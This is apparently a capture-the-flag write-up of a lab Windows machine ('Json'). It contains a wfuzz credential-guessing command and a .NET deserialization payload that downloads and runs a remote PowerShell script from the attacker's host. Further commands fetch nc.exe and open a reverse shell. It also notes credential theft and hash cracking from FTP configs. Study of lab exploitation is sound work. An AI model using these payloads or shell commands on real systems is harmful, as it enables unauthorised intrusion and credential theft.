u - json - 10.10.10.158

![3d2f47c47a0895779c0520660701d47b.png](../../_resources/2095e6ea09ae44659fd2caa6b90063a3.png)



![010c9cf2be5e3182442b99de68a56088.png](../../_resources/14e1b9a9c3c3403c8851e519a1a0ad3c.png)




Web?
wfuzz --hh=17 -c -w /usr/share/dirb/wordlists/big.txt -d '{"UserName":"FUZZ","Password":""}' -H "Content-Type: application/json;charset=utf-8" http://10.10.10.158/api/token 
Web creds admin admin

ysoserial.net is a payload generator for .net serializers


![acf46e4aa7b3cab854f27e25e2f0051e.png](../../_resources/27d9ed15eb1d416b8aef2c7c3ab1bede.png)





After login we see this request



![251f553422446ad50651f43be5ffcc5b.png](../../_resources/cf3ef3d8df8740839854bae2535f958f.png)


Sending the Bearer hash to base64 decode we see



![0f90efc50d6af507c1e575619f40e570.png](:/92b5b6c75c964f758733941bbec42c9c)


Therfore if we encode our yso payload in base64 


![abf3cfe0b3da1857271b88ba7c9c399f.png](../../_resources/ff9491abd389443a8b0865af41a1bb6c.png)



next we replace the oauth token


![21767d64aab1dd4f105ecd8e330e51f3.png](../../_resources/3abaa2521f294651af70e60b507e3444.png)



![64f9e8d3e673a210ed8a6a7112c104bb.png](../../_resources/8fec14f9b0bb4975ae35ba7f2dfaac18.png)




So we can connect, next to change the command to create a revers shell but first lets test if we have powershell with the following command


![371541af5d9cc7b650c56488b1403570.png](../../_resources/9f790092878540a38e1afe6469861af8.png)


We got another request.

i played around and eventually made a secondary stage loader with with thanks to https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell

```
{                                                                                                                                                                                                                                          
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['powershell',"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.145:1337/payload.ps1')"]
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```

re encoding



![d5c6bb7213eb6b9a7f0882d8de96e648.png](../../_resources/b5e5a67fbf3e42c9a1d703760daa574a.png)


now we can copy nc into the server fodler.


![382c07793dadf6924e04b9ca3737b34d.png](../../_resources/20f5b6581a704416b32a9fc2e992bbb2.png)



And make teh payload 
```
wget http://10.10.14.145:1337/nc.exe -OutFile c:/Windows/Temp/x1445.exe
c:/Windows/Temp/x1445.exe -e cmd 10.10.14.145 1338
```


This gives us a reverse shell navagating round i found a file.


![6641f497df687eee7708a9ddd882947d.png](../../_resources/bbe0ddf34bb048e5a89f9f037e4084f2.png)


That turned out to be not useful may ahve been left by another person
However we also find a config for a programe called Sync2Ftp wich looks like ftp creds for the local box.


![5a693299b39add1cf2cad21b57766926.png](../../_resources/927d486ffb674997bed2d54c2449bb40.png)



Addionally we find a fillezilla server config


![d45dc832dbd4130729e9a32b5e1d80cd.png](../../_resources/063c6694fb464e4fab503a4104fd30ab.png)


next we use john jumbo to extract the hash and crack teh pass.


![a6f573080997a70e7b4b717d6679f0cb.png](../../_resources/61a9ce48775f47e89be28640e040d9c8.png)




https://github.com/ohpe/juicy-potato


![8a144e6dcde2770b9aef98a9c5208034.png](../../_resources/3c33d614372d446bafa7b7c3b56c98c9.png)



